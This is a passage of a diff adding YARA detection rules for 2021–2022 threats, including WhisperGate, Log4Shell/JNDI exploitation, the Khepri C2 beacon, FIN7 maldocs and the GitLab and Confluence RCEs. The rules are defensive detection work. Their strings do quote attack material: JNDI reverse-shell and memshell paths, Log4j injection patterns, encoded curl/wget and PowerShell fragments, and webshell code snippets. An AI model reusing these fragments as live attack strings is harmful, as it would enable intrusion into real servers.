+      for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert SHA2 Assured ID Code Signing CA" and pe.signatures [ i ] . serial == "08:68:70:51:50:f1:cf:c1:fc:c3:fc:91:a4:49:49:a6" )
+}
+
+rule MAL_OBFUSC_Unknown_Jan22_1_RID2FC7 : DEMO EXE FILE MAL OBFUS T1027 {
+   meta:
+      description = "Detects samples similar to reversed stage3 found in Ukrainian wiper incident named WhisperGate"
+      author = "Florian Roth"
+      reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
+      date = "2022-01-16 12:11:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
+      tags = "DEMO, EXE, FILE, MAL, OBFUS, T1027"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 37 00 63 00 38 00 63 00 62 00 35 00 35 00 39 00
+               38 00 65 00 37 00 32 00 34 00 64 00 33 00 34 00
+               33 00 38 00 34 00 63 00 63 00 65 00 37 00 34 00
+               30 00 32 00 62 00 31 00 31 00 66 00 30 00 65 } 
+      $xc2 = { 4D 61 69 6E 00 43 6C 61 73 73 4C 69 62 72 61 72
+               79 31 00 70 63 31 65 } 
+      $s1 = ".dll" wide
+      $s2 = "%&%,%s%" ascii fullword
+      $op1 = { a2 87 fa b1 44 a5 f5 12 da a7 49 11 5c 8c 26 d4 75 } 
+      $op2 = { d7 af 52 38 c7 47 95 c8 0e 88 f3 d5 0b } 
+      $op3 = { 6c 05 df d6 b8 ac 11 f2 67 16 cb b7 34 4d b6 91 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule MAL_Unknown_Discord_Characteristics_Jan22_1_RID3748 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects unknown malware with a few indicators also found in Wiper malware"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+      date = "2022-01-16 17:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "xownxloxadDxatxxax" wide
+      $s2 = "https://cdn.discordapp.com/attachments/" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule APT_HKTL_Wiper_WhisperGate_Jan22_1_RID331C : APT DEMO EXE HKTL MAL {
+   meta:
+      description = "Detects unknown wiper malware"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+      date = "2022-01-16 14:33:51"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92"
+      tags = "APT, DEMO, EXE, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 41 41 41 41 41 00 59 6F 75 72 20 68 61 72 64 20
+               64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63
+               6F 72 72 75 70 74 65 64 } 
+      $op1 = { 89 34 24 e8 3f ff ff ff 50 8d 65 f4 31 c0 59 5e 5f } 
+      $op2 = { 8d bd e8 df ff ff e8 04 de ff ff b9 00 08 00 00 f3 a5 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 03 00 00 00 c7 44 24 0c 00 00 00 00 } 
+      $op3 = { c7 44 24 0c 00 00 00 00 c7 44 24 08 00 02 00 00 89 44 24 04 e8 aa fe ff ff 83 ec 14 89 34 24 e8 3f ff ff ff 50 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or all of them
+}
+
+rule APT_HKTL_Wiper_WhisperGate_Jan22_2_RID331D : APT DEMO EXE HKTL MAL {
+   meta:
+      description = "Detects unknown wiper malware"
+      author = "Florian Roth"
+      reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+      date = "2022-01-16 14:34:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+      tags = "APT, DEMO, EXE, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sc1 = { 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00
+               6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00
+               55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00
+               63 00 67 00 42 00 30 00 41 00 43 } 
+      $sc2 = { 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00
+               70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68 } 
+      $s1 = "xownxloxadDxatxxax" wide
+      $s2 = "0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==" wide
+      $s3 = "https://cdn.discordapp.com/attachments/" wide
+      $s4 = "fffxfff.fff" ascii fullword
+      $op1 = { 20 6b 85 b9 03 20 14 19 91 52 61 65 20 e1 ae f1 } 
+      $op2 = { aa ae 74 20 d9 7c 71 04 59 20 71 cc 13 91 61 20 97 3c 2a c0 } 
+      $op3 = { 38 9c f3 ff ff 20 f2 96 4d e9 20 5d ae d9 ce 58 20 4f 45 27 } 
+      $op4 = { d4 67 d4 61 80 1c 00 00 04 38 35 02 00 00 20 27 c0 db 56 65 20 3d eb 24 de 61 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them or 7 of them
+}
+
+rule APT_MAL_HP_iLO_Firmware_Dec21_1_RID3183 : APT DEMO LINUX MAL {
+   meta:
+      description = "Detects suspicios ELF files with sections as described in malicious iLO Board analysis by AmnPardaz in December 2021"
+      author = "Florian Roth"
+      reference = "https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/"
+      date = "2021-12-28 13:25:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".newelf.elf.text" ascii
+      $s2 = ".newelf.elf.libc.so.data" ascii
+      $s3 = ".newelf.elf.Initial.stack" ascii
+      $s4 = ".newelf.elf.libevlog.so.data" ascii
+   condition: 
+      filesize < 5MB and 2 of them or all of them
+}
+
+rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1_RID3418 : CVE_2021_44228 DEMO EXPLOIT {
+   meta:
+      description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228"
+      author = "Florian Roth"
+      reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8"
+      date = "2021-12-12 15:15:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "CVE_2021_44228, DEMO, EXPLOIT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/ 
+   condition: 
+      1 of them
+}
+
+rule EXPL_JNDI_Exploit_Patterns_Dec21_1_RID3320 : DEMO EXPLOIT {
+   meta:
+      description = "Detects JNDI Exploit Kit patterns in files"
+      author = "Florian Roth"
+      reference = "https://github.com/pimps/JNDI-Exploit-Kit"
+      date = "2021-12-12 14:34:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x01 = "/Basic/Command/Base64/" 
+      $x02 = "/Basic/ReverseShell/" 
+      $x03 = "/Basic/TomcatMemshell" 
+      $x04 = "/Basic/JettyMemshell" 
+      $x05 = "/Basic/WeblogicMemshell" 
+      $x06 = "/Basic/JBossMemshell" 
+      $x07 = "/Basic/WebsphereMemshell" 
+      $x08 = "/Basic/SpringMemshell" 
+      $x09 = "/Deserialization/URLDNS/" 
+      $x10 = "/Deserialization/CommonsCollections1/Dnslog/" 
+      $x11 = "/Deserialization/CommonsCollections2/Command/Base64/" 
+      $x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/" 
+      $x13 = "/Deserialization/Jre8u20/TomcatMemshell" 
+      $x14 = "/TomcatBypass/Dnslog/" 
+      $x15 = "/TomcatBypass/Command/" 
+      $x16 = "/TomcatBypass/ReverseShell/" 
+      $x17 = "/TomcatBypass/TomcatMemshell" 
+      $x18 = "/TomcatBypass/SpringMemshell" 
+      $x19 = "/GroovyBypass/Command/" 
+      $x20 = "/WebsphereBypass/Upload/" 
+      $fp1 = "<html" 
+   condition: 
+      1 of ( $x* ) and not 1 of ( $fp* )
+}
+
+rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1_RID361A : CVE_2021_44228 DEMO EXPLOIT {
+   meta:
+      description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
+      author = "Florian Roth"
+      reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
+      date = "2021-12-12 16:41:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_44228, DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xa1 = "header with value of BadAttributeValueException: " 
+      $sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager" 
+      $sa2 = "Error looking up JNDI resource" 
+   condition: 
+      $xa1 or all of ( $sa* )
+}
+
+rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21_RID3732 : CVE_2021_44228 DEMO EXPLOIT SUSP T1132 {
+   meta:
+      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
+      author = "Florian Roth"
+      reference = "https://twitter.com/Reelix/status/1469327487243071493"
+      date = "2021-12-10 17:28:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-12-13"
+      type = "file"
+      tags = "CVE_2021_44228, DEMO, EXPLOIT, SUSP, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "Y3VybCAtcy" 
+      $sa2 = "N1cmwgLXMg" 
+      $sa3 = "jdXJsIC1zI" 
+      $sb1 = "fHdnZXQgLXEgLU8tI" 
+      $sb2 = "x3Z2V0IC1xIC1PLS" 
+      $sb3 = "8d2dldCAtcSAtTy0g" 
+      $fp1 = "<html" 
+   condition: 
+      1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* )
+}
+
+rule SUSP_JDNIExploit_Indicators_Dec21_RID3302 : DEMO SUSP {
+   meta:
+      description = "Detects indicators of JDNI usage in log files and other payloads"
+      author = "Florian Roth"
+      reference = "https://github.com/flypig5211/JNDIExploit"
+      date = "2021-12-10 14:29:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-12-12"
+      type = "file"
+      tags = "DEMO, SUSP"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\// 
+   condition: 
+      filesize < 100MB and $xr1
+}
+
+rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard_RID31D9 : CVE_2021_44228 DEMO EXPLOIT {
+   meta:
+      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
+      author = "Florian Roth"
+      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+      date = "2021-12-10 13:40:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-12-12"
+      type = "file"
+      tags = "CVE_2021_44228, DEMO, EXPLOIT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/ 
+      $x2 = "Reference Class Name: foo" 
+      $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/ 
+   condition: 
+      1 of ( $x* ) and not 1 of ( $fp* )
+}
+
+rule EXPL_Zoho_RCE_Fix_Lines_Dec21_1_RID31C0 : DEMO EXPLOIT {
+   meta:
+      description = "Detects lines in log lines of Zoho products that indicate RCE fixes (silent removal of evidence)"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1467784104930385923"
+      date = "2021-12-06 13:35:51"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "RCEF=" 
+      $sa1 = "\"attackStatus\"\\:\"active\"" 
+      $sa2 = "\"attackStatus\":\"active\"" 
+      $sd1 = "deletedCount" 
+      $sd_fp1 = "\"deletedCount\"\\:0" 
+      $sd_fp2 = "\"deletedCount\":0" 
+   condition: 
+      filesize < 6MB and $s1 and ( 1 of ( $sa* ) or ( $sd1 and not 1 of ( $sd_fp* ) ) )
+}
+
+rule WEBSHELL_ProxyShell_Exploitation_Nov21_1_RID35C4 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Detects webshells dropped by DropHell malware"
+      author = "Florian Roth"
+      reference = "https://www.deepinstinct.com/blog/do-not-exchange-it-has-a-shell-inside"
+      date = "2021-11-01 16:27:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s01 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request[" ascii wide
+      $s02 = "new System.IO.MemoryStream()" ascii wide
+      $s03 = "Transform(" ascii wide
+   condition: 
+      all of ( $s* )
+}
+
+rule EXPL_GitLab_CE_RCE_CVE_2021_22205_RID30B7 : CVE_2021_22205 DEMO EXPLOIT {
+   meta:
+      description = "Detects signs of exploitation of GitLab CE CVE-2021-22205"
+      author = "Florian Roth"
+      reference = "https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/"
+      date = "2021-10-26 12:51:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_22205, DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "VXNlci5maW5kX2J5KHVzZXJuYW1l" ascii
+      $sa2 = "VzZXIuZmluZF9ieSh1c2VybmFtZ" ascii
+      $sa3 = "Vc2VyLmZpbmRfYnkodXNlcm5hbW" ascii
+      $sb1 = "dXNlci5hZG1pb" ascii
+      $sb2 = "VzZXIuYWRtaW" ascii
+      $sb3 = "1c2VyLmFkbWlu" ascii
+      $sc1 = "dXNlci5zYXZlI" ascii
+      $sc2 = "VzZXIuc2F2ZS" ascii
+      $sc3 = "1c2VyLnNhdmUh" ascii
+   condition: 
+      1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
+}
+
+rule EXPL_GitLab_CE_RCE_Malformed_JPG_CVE_2021_22204_RID35EC : CVE_2021_22204 CVE_2021_22205 DEMO EXPLOIT {
+   meta:
+      description = "Detects malformed JPG files exploting EXIF vulnerability CVE-2021-22204 and used in the exploitation of GitLab vulnerability CVE-2021-22205"
+      author = "Florian Roth"
+      reference = "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog"
+      date = "2021-10-26 16:33:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_22204, CVE_2021_22205, DEMO, EXPLOIT"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $h1 = { 41 54 26 54 46 4F 52 4D } 
+      $sr1 = /\(metadata[\s]{0,3}\([A-Za-z]{1,20} "\\/ 
+   condition: 
+      filesize < 10KB and $h1 and $sr1
+}
+
+rule SUSP_PE_Discord_Attachment_Oct21_1_RID3357 : DEMO EXE FILE MAL SUSP {
+   meta:
+      description = "Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2021-10-12 14:43:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "https://cdn.discordapp.com/attachments/" ascii wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
+}
+
+rule SUSP_Encoded_Discord_Attachment_Oct21_1_RID3574 : DEMO MAL SUSP T1027 {
+   meta:
+      description = "Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2021-10-12 16:13:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, SUSP, T1027"
+      minimum_yara = "1.7"
+      
+   strings:
+      $enc_b01 = "Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz" ascii wide
+      $enc_b02 = "Nkbi5kaXNjb3JkYXBwLmNvbS9hdHRhY2htZW50c" ascii wide
+      $enc_b03 = "jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudH" ascii wide
+      $enc_b04 = "AGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABz" ascii wide
+      $enc_b05 = "BjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAc" ascii wide
+      $enc_b06 = "AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AH" ascii wide
+      $enc_h01 = "63646E2E646973636F72646170702E636F6D2F6174746163686D656E7473" ascii wide
+      $enc_h02 = "63646e2e646973636f72646170702e636f6d2f6174746163686d656e7473" ascii wide
+      $enc_r01 = "stnemhcatta/moc.ppadrocsid.ndc" ascii wide
+   condition: 
+      filesize < 5000KB and 1 of them
+}
+
+rule LOG_EXPL_ADSelfService_CVE_2021_40539_WebLog_Sep21_1_RID37A8 : CVE_2021_40539 DEMO EXPLOIT LOG {
+   meta:
+      description = "Detects suspicious log lines produeced during the exploitation of ADSelfService vulnerability CVE-2021-40539"
+      author = "Florian Roth"
+      reference = "https://us-cert.cisa.gov/ncas/alerts/aa21-259a"
+      date = "2021-09-20 17:47:51"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_40539, DEMO, EXPLOIT, LOG"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide
+      $x2 = "/ServletApi/../RestAPI/Connection" ascii wide
+   condition: 
+      filesize < 50MB and 1 of them
+}
+
+rule SUSP_OBFUSC_Indiators_XML_OfficeDoc_Sep21_1_RID3614 : DEMO OBFUS OFFICE SUSP T1027 T1193 T1203 {
+   meta:
+      description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2021-09-18 16:40:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, OBFUS, OFFICE, SUSP, T1027, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "<?xml " ascii wide
+      $xml_e = "Target=\"&#" ascii wide
+      $xml_mode_1 = "TargetMode=\"&#" ascii wide
+   condition: 
+      filesize < 500KB and $h1 and 1 of ( $xml* )
+}
+
+rule SUSP_OBFUSC_Indiators_XML_OfficeDoc_Sep21_2_RID3615 : CVE DEMO OBFUS OFFICE SUSP T1027 T1193 T1203 Windows {
+   meta:
+      description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+      author = "Florian Roth"
+      reference = "https://twitter.com/sudosev/status/1439205606129377282"
+      date = "2021-09-18 16:40:41"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE, DEMO, OBFUS, OFFICE, SUSP, T1027, T1193, T1203, Windows"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "<?xml " ascii wide
+      $a1 = "Target" ascii wide
+      $a2 = "TargetMode" ascii wide
+      $xml_e = "&#x0000" ascii wide
+   condition: 
+      filesize < 500KB and all of them
+}
+
+rule EXPL_MAL_MalDoc_OBFUSCT_MHTML_Sep21_1_RID32E2 : CVE_2021_40444 DEMO EXPLOIT MAL OBFUS OFFICE {
+   meta:
+      description = "Detects suspicious office reference files including an obfuscated MHTML reference exploiting CVE-2021-40444"
+      author = "Florian Roth"
+      reference = "https://twitter.com/decalage2/status/1438946225190014984?s=20"
+      date = "2021-09-18 14:24:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_40444, DEMO, EXPLOIT, MAL, OBFUS, OFFICE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "<?xml " ascii wide
+      $s1 = "109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#109;&#108" ascii wide
+   condition: 
+      filesize < 25KB and all of them
+}
+
+rule VULN_LNX_OMI_RCE_CVE_2021_386471_Sep21_RID320B : CVE_2021_38647 CVE_2021_386471 DEMO EXPLOIT FILE LINUX VULN {
+   meta:
+      description = "Detects a Linux OMI version vulnerable to CVE-2021-38647 (OMIGOD) which enables an unauthenticated RCE"
+      author = "Christian Burkard"
+      reference = "https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution"
+      date = "2021-09-16 13:48:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2021_38647, CVE_2021_386471, DEMO, EXPLOIT, FILE, LINUX, VULN"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $a1 = "/opt/omi/bin/omiagent" ascii fullword
+      $s1 = "OMI-1.6.8-0 - " ascii
+      $s2 = "OMI-1.6.6-0 - " ascii
+      $s3 = "OMI-1.6.4-1 - " ascii
+      $s4 = "OMI-1.6.4-0 - " ascii
+      $s5 = "OMI-1.6.2-0 - " ascii
+      $s6 = "OMI-1.6.1-0 - " ascii
+      $s7 = "OMI-1.5.0-0 - " ascii
+      $s8 = "OMI-1.4.4-0 - " ascii
+      $s9 = "OMI-1.4.3-2 - " ascii
+      $s10 = "OMI-1.4.3-1 - " ascii
+      $s11 = "OMI-1.4.3-0 - " ascii
+      $s12 = "OMI-1.4.2-5 - " ascii
+      $s13 = "OMI-1.4.2-4 - " ascii
+      $s14 = "OMI-1.4.2-3 - " ascii
+      $s15 = "OMI-1.4.2-2 - " ascii
+      $s16 = "OMI-1.4.2-1 - " ascii
+      $s17 = "OMI-1.4.1-1 - " ascii
+      $s18 = "OMI-1.4.1-0 - " ascii
+      $s19 = "OMI-1.4.0-6 - " ascii
+   condition: 
+      uint32be ( 0 ) == 0x7f454c46 and $a1 and 1 of ( $s* )
+}
+
+rule HKTL_Khepri_Beacon_Sep21_1_RID3027 : COBALTSTRIKE DEMO EXE HKTL T1105 {
+   meta:
+      description = "Detects Khepri C2 framework beacons"
+      author = "Florian Roth"
+      reference = "https://github.com/geemion/Khepri/"
+      date = "2021-09-08 12:27:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "86c48679db5f4c085fd741ebec5235bc6cf0cdf8ef2d98fd8a689ceb5088f431"
+      tags = "COBALTSTRIKE, DEMO, EXE, HKTL, T1105"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "NT %d.%d Build %d  ProductType:%s" ascii fullword
+      $xe1 = "YzIuQ01EUEFSQU0uY21k" ascii
+      $xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii
+      $xe3 = "jMi5DTURQQVJBTS5jbW" ascii
+      $sx1 = "c2.ProcessItem.user" ascii fullword
+      $sx2 = "c2.CMDPARAM.cmd" ascii fullword
+      $sx3 = "c2.DownLoadFile.file_path" ascii fullword
+      $sa1 = "file size zero" 
+      $sa2 = "cmd.exe /c " 
+      $sa3 = "error parse param" 
+      $sa4 = "innet_ip" 
+      $op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff } 
+      $op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db } 
+      $op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 7e 0d 43 00 b6 0d 43 00 cc } 
+      $op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d or uint32be ( 0 ) == 0x7f454c46 ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them
+}
+
+rule SUSP_OBFUSC_JS_Sept21_2_RID2E68 : DEMO G0046 OBFUS RUSSIA SUSP T1027 {
+   meta:
+      description = "Detects JavaScript obfuscation as used in MalDocs by FIN7 group"
+      author = "Florian Roth"
+      reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
+      date = "2021-09-07 11:13:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, G0046, OBFUS, RUSSIA, SUSP, T1027"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "=new RegExp(String.fromCharCode(" ascii
+      $s2 = ".charCodeAt(" ascii
+      $s3 = ".substr(0, " ascii
+      $s4 = "var shell = new ActiveXObject(" ascii
+      $s5 = "= new Date().getUTCMilliseconds();" ascii
+      $s6 = ".deleteFile(WScript.ScriptFullName);" ascii
+   condition: 
+      filesize < 6000KB and ( 4 of them )
+}
+
+rule APT_FIN7_MsDoc_Sep21_1_RID2E18 : APT DEMO FILE G0046 RUSSIA {
+   meta:
+      description = "Detects MalDocs used by FIN7 group"
+      author = "Florian Roth"
+      reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
+      date = "2021-09-07 10:59:51"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d60b6a8310373c9b84e6760c24185535"
+      tags = "APT, DEMO, FILE, G0046, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 00 4A 00 6F 00 68 00 6E 00 0B 00 57 00 31 00 30
+               00 50 00 72 00 6F 00 4F 00 66 00 66 00 31 00 36 } 
+      $s1 = "word_data.bin" ascii fullword
+      $s2 = "V:\\DOC\\For_JS" ascii
+      $s3 = "HomeCompany" ascii
+      $s4 = "W10ProOff16" ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule LOG_EXPL_Confluence_RCE_CVE_2021_26084_Sep21_RID34D3 : CVE_2021_26084 DEMO EXPLOIT LOG {
+   meta:
+      description = "Detects exploitation attempts against Confluence servers abusing a RCE reported as CVE-2021-26084"
+      author = "Florian Roth"
+      reference = "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md"
+      date = "2021-09-01 15:47:01"
+      score = 55
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
